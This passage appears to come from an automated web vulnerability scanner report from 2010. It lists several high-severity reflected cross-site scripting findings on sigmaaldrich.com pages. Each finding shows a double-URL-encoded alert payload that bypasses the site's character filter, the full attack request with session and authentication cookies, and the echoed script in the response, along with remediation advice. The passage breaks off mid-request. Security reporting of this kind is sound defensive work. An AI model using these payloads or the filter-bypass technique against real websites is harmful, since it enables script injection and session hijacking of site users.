Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:17 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryb6544";alert(1)//072c5b7bf71/chemistry-services.html","E404") ;
   </script>
...[SNIP]...

1.57. http://www.sigmaaldrich.com/chemistry/chemistry-services.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca178%2522%253balert%25281%2529%252f%252fcb5ecdfb5ed was submitted in the REST URL parameter 2. This input was echoed as ca178";alert(1)//cb5ecdfb5ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/ca178%2522%253balert%25281%2529%252f%252fcb5ecdfb5ed HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/ca178";alert(1)//cb5ecdfb5ed","E404") ;
   </script>
...[SNIP]...

1.58. http://www.sigmaaldrich.com/chemistry/drug-discovery.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/drug-discovery.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a1df%2522%253balert%25281%2529%252f%252fbbb9e6e45da was submitted in the REST URL parameter 1. This input was echoed as 7a1df";alert(1)//bbb9e6e45da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry7a1df%2522%253balert%25281%2529%252f%252fbbb9e6e45da/drug-discovery.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry7a1df";alert(1)//bbb9e6e45da/drug-discovery.html","E404") ;
   </script>
...[SNIP]...

1.59. http://www.sigmaaldrich.com/chemistry/drug-discovery.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/drug-discovery.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f09%2522%253balert%25281%2529%252f%252f6b5e9380a23 was submitted in the REST URL parameter 2. This input was echoed as 80f09";alert(1)//6b5e9380a23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/80f09%2522%253balert%25281%2529%252f%252f6b5e9380a23 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/80f09";alert(1)//6b5e9380a23","E404") ;
   </script>
...[SNIP]...

1.60. http://www.sigmaaldrich.com/chemistry/greener-alternatives.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/greener-alternatives.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51bd0%2522%253balert%25281%2529%252f%252f15cc2c92527 was submitted in the REST URL parameter 1. This input was echoed as 51bd0";alert(1)//15cc2c92527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry51bd0%2522%253balert%25281%2529%252f%252f15cc2c92527/greener-alternatives.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry51bd0";alert(1)//15cc2c92527/greener-alternatives.html","E404") ;
   </script>
...[SNIP]...

1.61. http://www.sigmaaldrich.com/chemistry/greener-alternatives.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/greener-alternatives.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ccf%2522%253balert%25281%2529%252f%252ffbceb469c33 was submitted in the REST URL parameter 2. This input was echoed as 21ccf";alert(1)//fbceb469c33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/21ccf%2522%253balert%25281%2529%252f%252ffbceb469c33 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 